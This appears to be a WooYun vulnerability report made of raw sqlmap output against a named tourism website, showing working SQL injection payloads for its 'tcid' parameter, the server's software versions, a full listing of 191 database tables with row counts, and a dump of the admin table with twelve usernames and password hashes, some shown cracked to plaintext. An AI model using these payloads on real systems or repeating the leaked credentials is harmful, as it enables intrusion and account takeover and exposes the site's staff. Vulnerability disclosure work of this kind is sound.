WooYun.org

http://www.jiuhuashan.cc/expand_ticket/?tcid=4

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: tcid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tcid=4) AND 2762=2762 AND (9972=9972
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: tcid=4) AND (SELECT 2623 FROM(SELECT COUNT(*),CONCAT(0x716a626271,(SELECT (ELT(2623=2623,1))),0x7162787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2418=2418
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: tcid=4) AND (SELECT * FROM (SELECT(SLEEP(10)))LuZw) AND (8920=8920
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.13
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] newjiuhuashan
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: tcid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tcid=4) AND 2762=2762 AND (9972=9972
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: tcid=4) AND (SELECT 2623 FROM(SELECT COUNT(*),CONCAT(0x716a626271,(SELECT (ELT(2623=2623,1))),0x7162787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2418=2418
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: tcid=4) AND (SELECT * FROM (SELECT(SLEEP(10)))LuZw) AND (8920=8920
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.13
back-end DBMS: MySQL 5.0
Database: newjiuhuashan
[191 tables]
+--------------------------------+
| ad                             |
| ad_position                    |
| admin                          |
| admin_group                    |
| admin_module                   |
| admin_module_operate           |
| admin_privileges               |
| area                           |
| article                        |
| article_cate                   |
| article_pic                    |
| article_video                  |
| bus                            |
| bus_brand                      |
| bus_channel                    |
| bus_channel_group              |
| bus_city                       |
| bus_order                      |
| bus_pic                        |
| bus_price                      |
| bus_price_project              |
| bus_price_project_price        |
| bus_price_type                 |
| bus_type                       |
| bus_type_price_project         |
| bus_vas                        |
| bus_vas_order                  |
| channel                        |
| channel_group                  |
| compose                        |
| for_buddha                     |
| for_thing                      |
| get_ticket_log                 |
| guestbook                      |
| guide                          |
| guide_channel                  |
| guide_channel_group            |
| guide_order                    |
| guide_pic                      |
| guide_price                    |
| guide_price_project            |
| guide_price_project_price      |
| guide_price_type               |
| hotel                          |
| hotel_pic                      |
| hotel_price                    |
| hotel_price140102              |
| hotel_price_project            |
| hotel_price_project_price      |
| hotel_price_type               |
| hotel_price_type_content       |
| hotel_room                     |
| hotel_room_allot               |
| hotel_room_channel             |
| hotel_room_channel_group       |
| hotel_room_num                 |
| hotel_room_order               |
| hotel_room_order_info          |
| hotel_room_pic                 |
| hotel_room_price               |
| hotel_room_price_project       |
| hotel_room_price_project_price |
| hotel_room_price_type          |
| hotel_room_type                |
| hotel_service                  |
| hotel_service_cate             |
| hotel_service_cate_content     |
| hotel_service_channel          |
| hotel_service_channel_group    |
| hotel_service_info             |
| hotel_service_meeting_put      |
| hotel_service_order            |
| hotel_service_order_info       |
| hotel_service_pic              |
| hotel_service_vas              |
| income_log                     |
| indent                         |
| intro                          |
| iptocity                       |
| line                           |
| line_city                      |
| line_client                    |
| line_content                   |
| line_dir                       |
| line_goal                      |
| line_list                      |
| line_order                     |
| line_order_info                |
| line_pic                       |
| line_price                     |
| line_price_project             |
| line_price_project_price       |
| line_price_project_temp        |
| line_price_type                |
| line_rank                      |
| line_temp                      |
| line_topic                     |
| line_travel                    |
| links                          |
| links_cate                     |
| mail_config                    |
| mail_message                   |
| member_group                   |
| members                        |
| my_tags                        |
| mycart                         |
| mycart_vas                     |
| operate_order_log              |
| operate_shortcut               |
| order_status_log               |
| orders                         |
| other_fees                     |
| package                        |
| package_cate                   |
| package_channel                |
| package_channel_group          |
| package_order                  |
| package_pic                    |
| pay_log                        |
| pay_method                     |
| personal_line                  |
| plate                          |
| recom_position                 |
| redeem_place                   |
| rent_car                       |
| rent_car_area                  |
| rent_car_brand                 |
| rent_car_channel               |
| rent_car_channel_group         |
| rent_car_content               |
| rent_car_num                   |
| rent_car_order                 |
| rent_car_pic                   |
| rent_car_price                 |
| rent_car_price_project         |
| rent_car_service_point         |
| rent_car_vas                   |
| rent_car_vas_cart              |
| rent_car_vas_order             |
| route                          |
| route_ip                       |
| runningtime                    |
| s_pic                          |
| sarea                          |
| sarea_cate                     |
| sms_config                     |
| specialty                      |
| specialty_channel              |
| specialty_channel_group        |
| specialty_order                |
| specialty_order_info           |
| specialty_pic                  |
| specialty_type                 |
| ticket                         |
| ticket_cate                    |
| ticket_cate_content            |
| ticket_cate_pic                |
| ticket_channel                 |
| ticket_channel_group           |
| ticket_content                 |
| ticket_order                   |
| ticket_order_info              |
| ticket_pic                     |
| ticket_price                   |
| ticket_price_project           |
| ticket_price_project_price     |
| ticket_price_type              |
| ticket_price_type_content      |
| ticket_vas                     |
| tpl                            |
| uc_admins                      |
| uc_applications                |
| uc_badwords                    |
| uc_domains                     |
| uc_failedlogins                |
| uc_feeds                       |
| uc_friends                     |
| uc_mailqueue                   |
| uc_memberfields                |
| uc_members                     |
| uc_mergemembers                |
| uc_newpm                       |
| uc_notelist                    |
| uc_pms                         |
| uc_protectedmembers            |
| uc_settings                    |
| uc_sqlcache                    |
| uc_tags                        |
| uc_vars                        |
| web_config                     |
| wish                           |
+--------------------------------+
Database: newjiuhuashan
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| iptocity                       | 319356  |
| route_ip                       | 187150  |
| hotel_room_price               | 50412   |
| hotel_price140102              | 47530   |
| for_buddha                     | 25180   |
| ticket_price                   | 11894   |
| article                        | 10218   |
| hotel_room_num                 | 10037   |
| line_price                     | 9423    |
| uc_memberfields                | 8976    |
| uc_members                     | 8976    |
| article_pic                    | 3549    |
| wish                           | 2878    |
| guestbook                      | 2286    |
| uc_pms                         | 1331    |
| mail_message                   | 1004    |
| bus_price                      | 894     |
| orders                         | 763     |
| members                        | 760     |
| admin_privileges               | 721     |
| s_pic                          | 497     |
| hotel_room_order               | 428     |
| hotel_room_pic                 | 414     |
| personal_line                  | 389     |
| admin_module_operate           | 342     |
| ticket_order_info              | 308     |
| guide_price                    | 272     |
| ticket_order                   | 260     |
| hotel_service_pic              | 244     |
| hotel_room_price_project_price | 230     |
| hotel_room_price_project       | 215     |
| article_cate                   | 201     |
| operate_order_log              | 200     |
| bus                            | 189     |
| mycart                         | 154     |
| article_video                  | 114     |
| hotel_price_project_price      | 103     |
| hotel_pic                      | 99      |
| route                          | 99      |
| sarea                          | 81      |
| line_list                      | 70      |
| pay_log                        | 65      |
| rent_car_price                 | 63      |
| line_order                     | 61      |
| hotel_service                  | 58      |
| hotel_room_order_info          | 53      |
| income_log                     | 53      |
| ad                             | 52      |
| hotel_price_project            | 50      |
| links                          | 49      |
| my_tags                        | 48      |
| rent_car_pic                   | 48      |
| order_status_log               | 47      |
| line_price_project_price       | 46      |
| compose                        | 39      |
| hotel_room_type                | 39      |
| hotel_room                     | 37      |
| bus_city                       | 34      |
| ad_position                    | 33      |
| line_price_project             | 33      |
| hotel_room_price_type          | 30      |
| line                           | 30      |
| line_content                   | 30      |
| admin                          | 28      |
| ticket_pic                     | 28      |
| mail_config                    | 27      |
| sms_config                     | 27      |
| hotel_service_info             | 26      |
| uc_settings                    | 24      |
| ticket_price_project_price     | 23      |
| admin_module                   | 21      |
| hotel_service_order            | 21      |
| hotel_room_allot               | 18      |
| rent_car_area                  | 17      |
| ticket_price_project           | 16      |
| ticket_price_type              | 16      |
| ticket_price_type_content      | 16      |
| specialty_order                | 14      |
| intro                          | 13      |
| line_price_type                | 13      |
| operate_shortcut               | 13      |
| rent_car_order                 | 13      |
| rent_car_vas                   | 13      |
| bus_price_project_price        | 12      |
| ticket_channel_group           | 12      |
| uc_notelist                    | 12      |
| specialty_pic                  | 11      |
| uc_friends                     | 11      |
| hotel_service_channel_group    | 10      |
| line_city                      | 10      |
| redeem_place                   | 9       |
| rent_car                       | 9       |
| rent_car_content               | 9       |
| tpl                            | 9       |
| plate                          | 8       |
| recom_position                 | 8       |
| bus_type                       | 7       |
| get_ticket_log                 | 7       |
| line_pic                       | 7       |
| package_pic                    | 7       |
| uc_vars                        | 7       |
| bus_price_project              | 6       |
| hotel                          | 6       |
| hotel_price_type               | 6       |
| hotel_price_type_content       | 6       |
| specialty                      | 6       |
| ticket                         | 6       |
| ticket_content                 | 6       |
| admin_group                    | 5       |
| hotel_service_cate             | 5       |
| hotel_service_cate_content     | 5       |
| hotel_service_meeting_put      | 5       |
| links_cate                     | 5       |
| pay_method                     | 5       |
| bus_channel_group              | 4       |
| hotel_room_channel_group       | 4       |
| line_dir                       | 4       |
| package_order                  | 4       |
| specialty_channel_group        | 4       |
| ticket_cate                    | 4       |
| ticket_cate_content            | 4       |
| bus_brand                      | 3       |
| bus_vas                        | 3       |
| guide_order                    | 3       |
| line_client                    | 3       |
| line_rank                      | 3       |
| member_group                   | 3       |
| rent_car_brand                 | 3       |
| rent_car_num                   | 3       |
| rent_car_price_project         | 3       |
| area                           | 2       |
| bus_price_type                 | 2       |
| channel_group                  | 2       |
| guide_channel_group            | 2       |
| guide_price_project            | 2       |
| guide_price_project_price      | 2       |
| line_goal                      | 2       |
| package_channel_group          | 2       |
| rent_car_channel_group         | 2       |
| rent_car_vas_cart              | 2       |
| sarea_cate                     | 2       |
| specialty_type                 | 2       |
| ticket_vas                     | 2       |
| uc_applications                | 2       |
| uc_protectedmembers            | 2       |
| bus_order                      | 1       |
| channel                        | 1       |
| guide                          | 1       |
| guide_price_type               | 1       |
| hotel_service_channel          | 1       |
| hotel_service_vas              | 1       |
| line_topic                     | 1       |
| line_travel                    | 1       |
| other_fees                     | 1       |
| package_cate                   | 1       |
| package_channel                | 1       |
| uc_admins                      | 1       |
| uc_failedlogins                | 1       |
| web_config                     | 1       |
+--------------------------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: tcid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tcid=4) AND 2762=2762 AND (9972=9972
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: tcid=4) AND (SELECT 2623 FROM(SELECT COUNT(*),CONCAT(0x716a626271,(SELECT (ELT(2623=2623,1))),0x7162787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (2418=2418
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: tcid=4) AND (SELECT * FROM (SELECT(SLEEP(10)))LuZw) AND (8920=8920
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.2.13
back-end DBMS: MySQL 5.0
Database: newjiuhuashan
Table: admin
[12 entries]
+-------------------------------------------+------------+
| admin_pass                                | admin_name |
+-------------------------------------------+------------+
| 5fab2371ef76580f044d4ce39b94901b          | admin      |
| 8f2e74bf8baf0e0ca8778c440c8dfcf6 (woaishe)| raojun     |
| 682ce69d7111440079343a3ad2297009          | panda      |
| 800a53aa5a1b319bd86c4e1d496f2af8          | yefei      |
| b4096479db9125c874222697b6522df4          | zhaoqh     |
| ef33c351893e7baa713ff4fe560f694b          | lqf        |
| f75991e2ee1593e2ca84e3cb8ddfd906          | dx         |
| 0b5d9ca0acb73689904f41a035af4ad7          | weihua     |
| 0276cbf4fbfedd53ba48720a58df77e3 (222111) | chl        |
| 96e79218965eb72c92a549dd5a330112 (111111) | nieg       |
| 4c3141ef4b76d341fbd2efb86241ac34          | jhgf       |
| d8fee065fbfb4ee8ca989f9db2a47651          | zhusf      |
+-------------------------------------------+------------+

http://www.ips.com.cn/